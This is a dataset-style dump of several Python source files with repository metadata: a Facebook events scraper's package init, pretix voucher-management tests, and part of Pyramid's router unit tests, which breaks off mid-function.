] | 10 | 2020-10-02T21:54:07.000Z | 2021-05-01T18:06:32.000Z | facebook_events_scraper/__init__.py | munyoudoum/facebook-events-scraper | b51c6f316fcf11d56c9869895e0e4db9e2b8234d | [
"MIT"
] | 2 | 2020-12-10T21:45:41.000Z | 2020-12-21T15:18:23.000Z | facebook_events_scraper/__init__.py | munyoudoum/facebook-events-scraper | b51c6f316fcf11d56c9869895e0e4db9e2b8234d | [
"MIT"
] | 3 | 2020-10-09T08:18:55.000Z | 2021-11-10T17:28:39.000Z | from .login import login
from .driver import driver
from .scraper import event_info
from .scraper import events_recurring
from .scraper import events_upcoming
from .scraper import events
__version__ = '0.0.1b3'
| 26.375 | 37 | 0.819905 | 31 | 211 | 5.354839 | 0.419355 | 0.26506 | 0.409639 | 0.415663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0.127962 | 211 | 7 | 38 | 30.142857 | 0.880435 | 0 | 0 | 0 | 0 | 0 | 0.033175 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.857143 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
60908a1667a0ecfa5b19dda90b8655d2a5d1ee9b | 22,445 | py | Python | src/tests/control/test_vouchers.py | upsidedownpancake/pretix | bfeeb1028c9eccab4936029db7c38edd4cd5aad5 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/control/test_vouchers.py | upsidedownpancake/pretix | bfeeb1028c9eccab4936029db7c38edd4cd5aad5 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/tests/control/test_vouchers.py | upsidedownpancake/pretix | bfeeb1028c9eccab4936029db7c38edd4cd5aad5 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import datetime
import json
from django.utils.timezone import now
from tests.base import SoupTest, extract_form_fields
from pretix.base.models import (
Event, Item, ItemVariation, Organizer, Quota, Team, User, Voucher,
)
class VoucherFormTest(SoupTest):
def setUp(self):
super().setUp()
self.user = User.objects.create_user('dummy@dummy.dummy', 'dummy')
self.orga = Organizer.objects.create(name='CCC', slug='ccc')
self.event = Event.objects.create(
organizer=self.orga, name='30C3', slug='30c3',
date_from=datetime.datetime(2013, 12, 26, tzinfo=datetime.timezone.utc),
)
t = Team.objects.create(organizer=self.orga, can_view_vouchers=True, can_change_vouchers=True)
t.members.add(self.user)
t.limit_events.add(self.event)
self.client.login(email='dummy@dummy.dummy', password='dummy')
self.quota_shirts = Quota.objects.create(event=self.event, name='Shirts', size=2)
self.shirt = Item.objects.create(event=self.event, name='T-Shirt', default_price=12)
self.quota_shirts.items.add(self.shirt)
self.shirt_red = ItemVariation.objects.create(item=self.shirt, default_price=14, value='Red')
self.shirt_blue = ItemVariation.objects.create(item=self.shirt, value='Blue')
self.quota_shirts.variations.add(self.shirt_red)
self.quota_shirts.variations.add(self.shirt_blue)
self.quota_tickets = Quota.objects.create(event=self.event, name='Tickets', size=5)
self.ticket = Item.objects.create(event=self.event, name='Early-bird ticket',
default_price=23)
self.quota_tickets.items.add(self.ticket)
def _create_voucher(self, data, expected_failure=False):
count_before = self.event.vouchers.count()
doc = self.get_doc('/control/event/%s/%s/vouchers/add' % (self.orga.slug, self.event.slug))
form_data = extract_form_fields(doc.select('.container-fluid form')[0])
form_data.update(data)
doc = self.post_doc('/control/event/%s/%s/vouchers/add' % (self.orga.slug, self.event.slug), form_data)
if expected_failure:
assert doc.select(".alert-danger, .has-error")
assert count_before == self.event.vouchers.count()
else:
assert doc.select(".alert-success")
assert count_before + 1 == self.event.vouchers.count()
def _create_bulk_vouchers(self, data, expected_failure=False):
count_before = self.event.vouchers.count()
doc = self.get_doc('/control/event/%s/%s/vouchers/bulk_add' % (self.orga.slug, self.event.slug))
form_data = extract_form_fields(doc.select('.container-fluid form')[0])
form_data.update(data)
doc = self.post_doc('/control/event/%s/%s/vouchers/bulk_add' % (self.orga.slug, self.event.slug), form_data)
if expected_failure:
assert doc.select(".alert-danger")
assert count_before == self.event.vouchers.count()
else:
assert doc.select(".alert-success")
assert count_before + len(form_data.get('codes').split("\n")) == self.event.vouchers.count()
def _change_voucher(self, v, data, expected_failure=False):
doc = self.get_doc('/control/event/%s/%s/vouchers/%s/' % (self.orga.slug, self.event.slug, v.pk))
form_data = extract_form_fields(doc.select('.container-fluid form')[0])
form_data.update(data)
doc = self.post_doc('/control/event/%s/%s/vouchers/%s/' % (self.orga.slug, self.event.slug, v.pk), form_data)
if expected_failure:
assert doc.select(".alert-danger")
else:
assert doc.select(".alert-success")
def test_list(self):
self.event.vouchers.create(item=self.ticket, code='ABCDEFG')
doc = self.client.get('/control/event/%s/%s/vouchers/' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' in doc.rendered_content
def test_csv(self):
self.event.vouchers.create(item=self.ticket, code='ABCDEFG')
doc = self.client.get('/control/event/%s/%s/vouchers/?download=yes' % (self.orga.slug, self.event.slug))
assert doc.content.strip() == '"Voucher code","Valid until","Product","Reserve quota","Bypass quota",' \
'"Price effect","Value","Tag","Redeemed","Maximum usages"\r\n"ABCDEFG","",' \
'"Early-bird ticket","No","No","No effect","","","0","1"'.encode('utf-8')
def test_filter_status_valid(self):
v = self.event.vouchers.create(item=self.ticket)
doc = self.client.get('/control/event/%s/%s/vouchers/?status=v' % (self.orga.slug, self.event.slug))
assert v.code in doc.rendered_content
v.redeemed = 1
v.save()
doc = self.client.get('/control/event/%s/%s/vouchers/?status=v' % (self.orga.slug, self.event.slug))
assert v.code not in doc.rendered_content
def test_filter_status_redeemed(self):
v = self.event.vouchers.create(item=self.ticket, redeemed=1)
doc = self.client.get('/control/event/%s/%s/vouchers/?status=r' % (self.orga.slug, self.event.slug))
assert v.code in doc.rendered_content
v.redeemed = 0
v.save()
doc = self.client.get('/control/event/%s/%s/vouchers/?status=r' % (self.orga.slug, self.event.slug))
assert v.code not in doc.rendered_content
def test_filter_status_expired(self):
v = self.event.vouchers.create(item=self.ticket, valid_until=now() + datetime.timedelta(days=1))
doc = self.client.get('/control/event/%s/%s/vouchers/?status=e' % (self.orga.slug, self.event.slug))
assert v.code not in doc.rendered_content
v.valid_until = now() - datetime.timedelta(days=1)
v.save()
doc = self.client.get('/control/event/%s/%s/vouchers/?status=e' % (self.orga.slug, self.event.slug))
assert v.code in doc.rendered_content
def test_filter_tag(self):
self.event.vouchers.create(item=self.ticket, code='ABCDEFG', comment='Foo', tag='bar')
doc = self.client.get('/control/event/%s/%s/vouchers/?tag=bar' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' in doc.rendered_content
doc = self.client.get('/control/event/%s/%s/vouchers/?tag=baz' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' not in doc.rendered_content
def test_search_code(self):
self.event.vouchers.create(item=self.ticket, code='ABCDEFG', comment='Foo')
doc = self.client.get('/control/event/%s/%s/vouchers/?search=ABCDEFG' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' in doc.rendered_content
doc = self.client.get('/control/event/%s/%s/vouchers/?search=Foo' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' in doc.rendered_content
doc = self.client.get('/control/event/%s/%s/vouchers/?search=12345' % (self.orga.slug, self.event.slug))
assert 'ABCDEFG' not in doc.rendered_content
def test_bulk_rng(self):
rng = self.client.get('/control/event/%s/%s/vouchers/rng?num=7' % (self.orga.slug, self.event.slug))
codes = json.loads(rng.content.decode('utf-8'))['codes']
assert len(codes) == 7
assert all([len(r) == 16 for r in codes])
def test_display_voucher_code(self):
count_before = self.event.vouchers.count()
doc = self.get_doc('/control/event/%s/%s/vouchers/add' % (self.orga.slug, self.event.slug))
form_data = extract_form_fields(doc.select('.container-fluid form')[0])
form_data.update({
'itemvar': '%d' % self.ticket.pk
})
doc = self.post_doc('/control/event/%s/%s/vouchers/add' % (self.orga.slug, self.event.slug), form_data)
v = Voucher.objects.latest('pk')
assert v.code in doc.select(".alert-success")[0].text
assert count_before + 1 == self.event.vouchers.count()
def test_create_voucher_for_addon_item(self):
c = self.event.categories.create(name="Foo", is_addon=True)
self.ticket.category = c
self.ticket.save()
self._create_voucher({
'itemvar': '%d' % self.ticket.pk
}, expected_failure=True)
def test_create_non_blocking_item_voucher(self):
self._create_voucher({
'itemvar': '%d' % self.ticket.pk
})
v = Voucher.objects.latest('pk')
assert not v.block_quota
assert v.item.pk == self.ticket.pk
assert v.variation is None
assert v.quota is None
def test_create_non_blocking_variation_voucher(self):
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk)
})
v = Voucher.objects.latest('pk')
assert not v.block_quota
assert v.item.pk == self.shirt.pk
assert v.variation.pk == self.shirt_red.pk
assert v.quota is None
def test_create_non_blocking_quota_voucher(self):
self._create_voucher({
'itemvar': 'q-%d' % self.quota_tickets.pk
})
v = Voucher.objects.latest('pk')
assert not v.block_quota
assert v.item is None
assert v.variation is None
assert v.quota.pk == self.quota_tickets.pk
def test_create_blocking_item_voucher_quota_free(self):
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
})
v = Voucher.objects.latest('pk')
assert v.block_quota
def test_create_blocking_item_voucher_quota_full(self):
self._create_voucher({
'itemvar': '%d' % self.shirt.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_create_blocking_item_voucher_quota_full_invalid(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk),
'block_quota': 'on',
'valid_until_0': (now() - datetime.timedelta(days=3)).strftime('%Y-%m-%d'),
'valid_until_1': (now() - datetime.timedelta(days=3)).strftime('%H:%M:%S')
})
def test_create_blocking_variation_voucher_quota_free(self):
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk),
'block_quota': 'on'
})
v = Voucher.objects.latest('pk')
assert v.block_quota
def test_create_short_code(self):
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk),
'code': 'ABC'
}, expected_failure=True)
def test_create_blocking_variation_voucher_quota_full(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
self._create_voucher({
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_red.pk),
'block_quota': 'on'
}, expected_failure=True)
def test_create_blocking_quota_voucher_quota_free(self):
self._create_voucher({
'itemvar': 'q-%d' % self.quota_tickets.pk,
'block_quota': 'on'
})
v = Voucher.objects.latest('pk')
assert v.block_quota
def test_create_blocking_quota_voucher_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
self._create_voucher({
'itemvar': 'q-%d' % self.quota_tickets.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_change_non_blocking_voucher(self):
v = self.event.vouchers.create(item=self.ticket)
self._change_voucher(v, {
'itemvar': 'q-%d' % self.quota_tickets.pk
})
v.refresh_from_db()
assert v.item is None
assert v.variation is None
assert v.quota.pk == self.quota_tickets.pk
def test_change_blocking_voucher_unchanged_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = self.event.vouchers.create(item=self.ticket, block_quota=True)
self._change_voucher(v, {
})
v.refresh_from_db()
assert v.block_quota
def test_change_voucher_reduce_max_usages(self):
v = self.event.vouchers.create(item=self.ticket, max_usages=5, redeemed=3)
self._change_voucher(v, {
'max_usages': '2'
}, expected_failure=True)
def test_change_voucher_to_blocking_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = self.event.vouchers.create(item=self.ticket)
self._change_voucher(v, {
'block_quota': 'on'
}, expected_failure=True)
def test_change_voucher_to_blocking_quota_free(self):
v = self.event.vouchers.create(item=self.ticket)
self._change_voucher(v, {
'block_quota': 'on'
})
v.refresh_from_db()
assert v.block_quota
def test_change_voucher_validity_to_valid_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
v = self.event.vouchers.create(item=self.ticket, valid_until=now() - datetime.timedelta(days=3),
block_quota=True)
self._change_voucher(v, {
'valid_until_0': (now() + datetime.timedelta(days=3)).strftime('%Y-%m-%d'),
'valid_until_1': (now() + datetime.timedelta(days=3)).strftime('%H:%M:%S')
}, expected_failure=True)
v.refresh_from_db()
assert v.valid_until < now()
def test_change_voucher_validity_to_valid_quota_free(self):
v = self.event.vouchers.create(item=self.ticket, valid_until=now() - datetime.timedelta(days=3),
block_quota=True)
self._change_voucher(v, {
'valid_until_0': (now() + datetime.timedelta(days=3)).strftime('%Y-%m-%d'),
'valid_until_1': (now() + datetime.timedelta(days=3)).strftime('%H:%M:%S')
})
v.refresh_from_db()
assert v.valid_until > now()
def test_change_item_of_blocking_voucher_quota_free(self):
ticket2 = Item.objects.create(event=self.event, name='Late-bird ticket', default_price=23)
self.quota_tickets.items.add(ticket2)
v = self.event.vouchers.create(item=self.ticket, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d' % ticket2.pk,
})
def test_change_item_of_blocking_voucher_quota_full(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
hoodie = Item.objects.create(event=self.event, name='Hoodie', default_price=23)
self.quota_shirts.items.add(hoodie)
v = self.event.vouchers.create(item=self.ticket, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d' % hoodie.pk,
}, expected_failure=True)
def test_change_variation_of_blocking_voucher_quota_free(self):
self.quota_shirts.variations.remove(self.shirt_blue)
self.quota_tickets.variations.add(self.shirt_blue)
v = self.event.vouchers.create(item=self.shirt, variation=self.shirt_red, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_blue.pk),
})
def test_change_variation_of_blocking_voucher_quota_full(self):
self.quota_shirts.variations.remove(self.shirt_blue)
self.quota_tickets.variations.add(self.shirt_blue)
self.quota_tickets.size = 0
self.quota_tickets.save()
v = self.event.vouchers.create(item=self.shirt, variation=self.shirt_red, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_blue.pk),
}, expected_failure=True)
def test_change_quota_of_blocking_voucher_quota_free(self):
v = self.event.vouchers.create(quota=self.quota_tickets, block_quota=True)
self._change_voucher(v, {
'itemvar': 'q-%d' % self.quota_shirts.pk,
})
def test_change_quota_of_blocking_voucher_quota_full(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
v = self.event.vouchers.create(quota=self.quota_tickets, block_quota=True)
self._change_voucher(v, {
'itemvar': 'q-%d' % self.quota_shirts.pk,
}, expected_failure=True)
def test_change_item_of_blocking_voucher_without_quota_change(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
ticket2 = Item.objects.create(event=self.event, name='Standard Ticket', default_price=23)
self.quota_tickets.items.add(ticket2)
v = self.event.vouchers.create(item=self.ticket, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d' % ticket2.pk,
})
def test_change_variation_of_blocking_voucher_without_quota_change(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
v = self.event.vouchers.create(item=self.shirt, variation=self.shirt_red, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_blue.pk),
})
def test_create_duplicate_code(self):
v = self.event.vouchers.create(quota=self.quota_tickets)
self._create_voucher({
'code': v.code,
}, expected_failure=True)
def test_change_code_to_duplicate(self):
v1 = self.event.vouchers.create(quota=self.quota_tickets)
v2 = self.event.vouchers.create(quota=self.quota_tickets)
self._change_voucher(v1, {
'code': v2.code
}, expected_failure=True)
def test_create_bulk(self):
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH',
'itemvar': '%d' % self.shirt.pk,
})
def test_create_bulk_many(self):
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH\nIJKLM\nNOPQR\nSTUVW\nXYZ',
'itemvar': '%d' % self.ticket.pk,
})
def test_create_blocking_bulk_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH',
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_create_blocking_bulk_quota_free(self):
self.quota_tickets.size = 5
self.quota_tickets.save()
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH',
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
})
def test_create_blocking_bulk_quota_partial(self):
self.quota_tickets.size = 1
self.quota_tickets.save()
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH',
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_create_bulk_with_duplicate_code(self):
v = self.event.vouchers.create(quota=self.quota_tickets)
self._create_bulk_vouchers({
'codes': 'ABCDE\n%s' % v.code,
'itemvar': '%d' % self.shirt.pk,
}, expected_failure=True)
def test_delete_voucher(self):
v = self.event.vouchers.create(quota=self.quota_tickets)
doc = self.get_doc('/control/event/%s/%s/vouchers/%s/delete' % (self.orga.slug, self.event.slug, v.pk),
follow=True)
assert not doc.select(".alert-danger")
doc = self.post_doc('/control/event/%s/%s/vouchers/%s/delete' % (self.orga.slug, self.event.slug, v.pk),
{}, follow=True)
assert doc.select(".alert-success")
assert not self.event.vouchers.filter(pk=v.id).exists()
def test_delete_voucher_redeemed(self):
v = self.event.vouchers.create(quota=self.quota_tickets, redeemed=1)
doc = self.get_doc('/control/event/%s/%s/vouchers/%s/delete' % (self.orga.slug, self.event.slug, v.pk),
follow=True)
assert doc.select(".alert-danger")
doc = self.post_doc('/control/event/%s/%s/vouchers/%s/delete' % (self.orga.slug, self.event.slug, v.pk),
{}, follow=True)
assert doc.select(".alert-danger")
def test_subevent_optional(self):
self.event.has_subevents = True
self.event.save()
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
})
def test_subevent_non_blocking_quota_no_date(self):
self.event.has_subevents = True
self.event.save()
se1 = self.event.subevents.create(name="Foo", date_from=now())
self.event.subevents.create(name="Bar", date_from=now())
self.quota_tickets.subevent = se1
self.quota_tickets.save()
self._create_voucher({
'itemvar': 'q-%d' % self.quota_tickets.pk,
})
def test_subevent_required_for_blocking(self):
self.event.has_subevents = True
self.event.save()
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_subevent_blocking_quota_free(self):
self.event.has_subevents = True
self.event.save()
se1 = self.event.subevents.create(name="Foo", date_from=now())
se2 = self.event.subevents.create(name="Bar", date_from=now())
self.quota_tickets.subevent = se1
self.quota_tickets.save()
q2 = Quota.objects.create(event=self.event, name='Tickets', size=0, subevent=se2)
q2.items.add(self.ticket)
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on',
'subevent': se1.pk
})
def test_subevent_blocking_quota_full(self):
self.event.has_subevents = True
self.event.save()
se1 = self.event.subevents.create(name="Foo", date_from=now())
se2 = self.event.subevents.create(name="Bar", date_from=now())
self.quota_tickets.subevent = se1
self.quota_tickets.size = 0
self.quota_tickets.save()
q2 = Quota.objects.create(event=self.event, name='Tickets', size=5, subevent=se2)
q2.items.add(self.ticket)
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on',
'subevent': se1.pk
}, expected_failure=True)
| 43.163462 | 117 | 0.626108 | 2,936 | 22,445 | 4.58549 | 0.074932 | 0.060833 | 0.054668 | 0.047835 | 0.862438 | 0.837481 | 0.809849 | 0.762163 | 0.72235 | 0.684469 | 0 | 0.00662 | 0.232791 | 22,445 | 519 | 118 | 43.246628 | 0.775203 | 0 | 0 | 0.672566 | 0 | 0 | 0.112943 | 0.051281 | 0 | 0 | 0 | 0 | 0.119469 | 1 | 0.121681 | false | 0.004425 | 0.011062 | 0 | 0.134956 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6097018f0fe036e061cb3a84eab2bd39b25444d5 | 62,384 | py | Python | ENV/lib/python3.6/site-packages/pyramid/tests/test_router.py | captain-c00keys/pyramid-stocks | 0acf3363a6a7ee61cd41b855f43c9d6f9582ae6a | [
"MIT"
] | null | null | null | ENV/lib/python3.6/site-packages/pyramid/tests/test_router.py | captain-c00keys/pyramid-stocks | 0acf3363a6a7ee61cd41b855f43c9d6f9582ae6a | [
"MIT"
] | null | null | null | ENV/lib/python3.6/site-packages/pyramid/tests/test_router.py | captain-c00keys/pyramid-stocks | 0acf3363a6a7ee61cd41b855f43c9d6f9582ae6a | [
"MIT"
] | null | null | null | import unittest
from pyramid import testing
class TestRouter(unittest.TestCase):
def setUp(self):
self.config = testing.setUp()
self.registry = self.config.registry
def tearDown(self):
testing.tearDown()
def _registerRouteRequest(self, name):
from pyramid.interfaces import IRouteRequest
from pyramid.request import route_request_iface
iface = route_request_iface(name)
self.registry.registerUtility(iface, IRouteRequest, name=name)
return iface
def _connectRoute(self, name, path, factory=None):
from pyramid.interfaces import IRoutesMapper
from pyramid.urldispatch import RoutesMapper
mapper = self.registry.queryUtility(IRoutesMapper)
if mapper is None:
mapper = RoutesMapper()
self.registry.registerUtility(mapper, IRoutesMapper)
return mapper.connect(name, path, factory)
def _registerLogger(self):
from pyramid.interfaces import IDebugLogger
logger = DummyLogger()
self.registry.registerUtility(logger, IDebugLogger)
return logger
def _registerSettings(self, **kw):
settings = {'debug_authorization':False,
'debug_notfound':False,
'debug_routematch':False}
settings.update(kw)
self.registry.settings = settings
def _registerTraverserFactory(self, context, view_name='', subpath=None,
traversed=None, virtual_root=None,
virtual_root_path=None, raise_error=None,
**kw):
from pyramid.interfaces import ITraverser
if virtual_root is None:
virtual_root = context
if subpath is None:
subpath = []
if traversed is None:
traversed = []
if virtual_root_path is None:
virtual_root_path = []
class DummyTraverserFactory:
def __init__(self, root):
self.root = root
def __call__(self, request):
if raise_error:
raise raise_error
values = {'root':self.root,
'context':context,
'view_name':view_name,
'subpath':subpath,
'traversed':traversed,
'virtual_root':virtual_root,
'virtual_root_path':virtual_root_path}
kw.update(values)
return kw
self.registry.registerAdapter(DummyTraverserFactory, (None,),
ITraverser, name='')
def _registerView(self, app, name, classifier, req_iface, ctx_iface):
from pyramid.interfaces import IView
self.registry.registerAdapter(
app, (classifier, req_iface, ctx_iface), IView, name)
def _registerEventListener(self, iface):
L = []
def listener(event):
L.append(event)
self.registry.registerHandler(listener, (iface,))
return L
def _registerRootFactory(self, val):
rootfactory = DummyRootFactory(val)
from pyramid.interfaces import IRootFactory
self.registry.registerUtility(rootfactory, IRootFactory)
return rootfactory
def _getTargetClass(self):
from pyramid.router import Router
return Router
def _makeOne(self):
klass = self._getTargetClass()
return klass(self.registry)
def _makeEnviron(self, **extras):
environ = {
'wsgi.url_scheme':'http',
'SERVER_NAME':'localhost',
'SERVER_PORT':'8080',
'REQUEST_METHOD':'GET',
'PATH_INFO':'/',
}
environ.update(extras)
return environ
def test_ctor_registry_has_no_settings(self):
self.registry.settings = None
router = self._makeOne()
self.assertEqual(router.debug_notfound, False)
self.assertEqual(router.debug_routematch, False)
self.assertFalse('debug_notfound' in router.__dict__)
self.assertFalse('debug_routematch' in router.__dict__)
def test_root_policy(self):
context = DummyContext()
self._registerTraverserFactory(context)
rootfactory = self._registerRootFactory('abc')
router = self._makeOne()
self.assertEqual(router.root_policy, rootfactory)
def test_request_factory(self):
from pyramid.interfaces import IRequestFactory
class DummyRequestFactory(object):
pass
self.registry.registerUtility(DummyRequestFactory, IRequestFactory)
router = self._makeOne()
self.assertEqual(router.request_factory, DummyRequestFactory)
def test_tween_factories(self):
from pyramid.interfaces import ITweens
from pyramid.config.tweens import Tweens
from pyramid.response import Response
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IResponse
tweens = Tweens()
self.registry.registerUtility(tweens, ITweens)
L = []
def tween_factory1(handler, registry):
L.append((handler, registry))
def wrapper(request):
request.environ['handled'].append('one')
return handler(request)
wrapper.name = 'one'
wrapper.child = handler
return wrapper
def tween_factory2(handler, registry):
L.append((handler, registry))
def wrapper(request):
request.environ['handled'] = ['two']
return handler(request)
wrapper.name = 'two'
wrapper.child = handler
return wrapper
tweens.add_implicit('one', tween_factory1)
tweens.add_implicit('two', tween_factory2)
router = self._makeOne()
self.assertEqual(router.handle_request.name, 'two')
self.assertEqual(router.handle_request.child.name, 'one')
self.assertEqual(router.handle_request.child.child.__name__,
'handle_request')
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron()
view = DummyView('abc')
self._registerView(self.config.derive_view(view), '',
IViewClassifier, None, None)
start_response = DummyStartResponse()
def make_response(s):
return Response(s)
router.registry.registerAdapter(make_response, (str,), IResponse)
app_iter = router(environ, start_response)
self.assertEqual(app_iter, [b'abc'])
self.assertEqual(start_response.status, '200 OK')
self.assertEqual(environ['handled'], ['two', 'one'])
def test_call_traverser_default(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
logger = self._registerLogger()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('/' in why.args[0], why)
self.assertFalse('debug_notfound' in why.args[0])
self.assertEqual(len(logger.messages), 0)
def test_traverser_raises_notfound_class(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=HTTPNotFound)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(HTTPNotFound, router, environ, start_response)
def test_traverser_raises_notfound_instance(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=HTTPNotFound('foo'))
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('foo' in why.args[0], why)
def test_traverser_raises_forbidden_class(self):
from pyramid.httpexceptions import HTTPForbidden
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=HTTPForbidden)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(HTTPForbidden, router, environ, start_response)
def test_traverser_raises_forbidden_instance(self):
from pyramid.httpexceptions import HTTPForbidden
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context,
raise_error=HTTPForbidden('foo'))
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPForbidden, router, environ, start_response)
self.assertTrue('foo' in why.args[0], why)
def test_call_no_view_registered_no_isettings(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context)
logger = self._registerLogger()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('/' in why.args[0], why)
self.assertFalse('debug_notfound' in why.args[0])
self.assertEqual(len(logger.messages), 0)
def test_call_no_view_registered_debug_notfound_false(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context)
logger = self._registerLogger()
self._registerSettings(debug_notfound=False)
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('/' in why.args[0], why)
self.assertFalse('debug_notfound' in why.args[0])
self.assertEqual(len(logger.messages), 0)
def test_call_no_view_registered_debug_notfound_true(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context)
self._registerSettings(debug_notfound=True)
logger = self._registerLogger()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue(
"debug_notfound of url http://localhost:8080/; " in why.args[0])
self.assertTrue("view_name: '', subpath: []" in why.args[0])
self.assertTrue('http://localhost:8080' in why.args[0], why)
self.assertEqual(len(logger.messages), 1)
message = logger.messages[0]
self.assertTrue('of url http://localhost:8080' in message)
self.assertTrue("path_info: " in message)
self.assertTrue('DummyContext' in message)
self.assertTrue("view_name: ''" in message)
self.assertTrue("subpath: []" in message)
def test_call_view_returns_non_iresponse(self):
from pyramid.interfaces import IViewClassifier
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron()
view = DummyView('abc')
self._registerView(self.config.derive_view(view), '', IViewClassifier,
None, None)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(ValueError, router, environ, start_response)
def test_call_view_returns_adapted_response(self):
from pyramid.response import Response
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IResponse
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron()
view = DummyView('abc')
self._registerView(self.config.derive_view(view), '',
IViewClassifier, None, None)
router = self._makeOne()
start_response = DummyStartResponse()
def make_response(s):
return Response(s)
router.registry.registerAdapter(make_response, (str,), IResponse)
app_iter = router(environ, start_response)
self.assertEqual(app_iter, [b'abc'])
self.assertEqual(start_response.status, '200 OK')
def test_call_with_request_extensions(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequestExtensions
from pyramid.interfaces import IRequest
from pyramid.request import Request
from pyramid.util import InstancePropertyHelper
context = DummyContext()
self._registerTraverserFactory(context)
class Extensions(object):
def __init__(self):
self.methods = {}
self.descriptors = {}
extensions = Extensions()
ext_method = lambda r: 'bar'
name, fn = InstancePropertyHelper.make_property(ext_method, name='foo')
extensions.descriptors[name] = fn
request = Request.blank('/')
request.request_iface = IRequest
request.registry = self.registry
def request_factory(environ):
return request
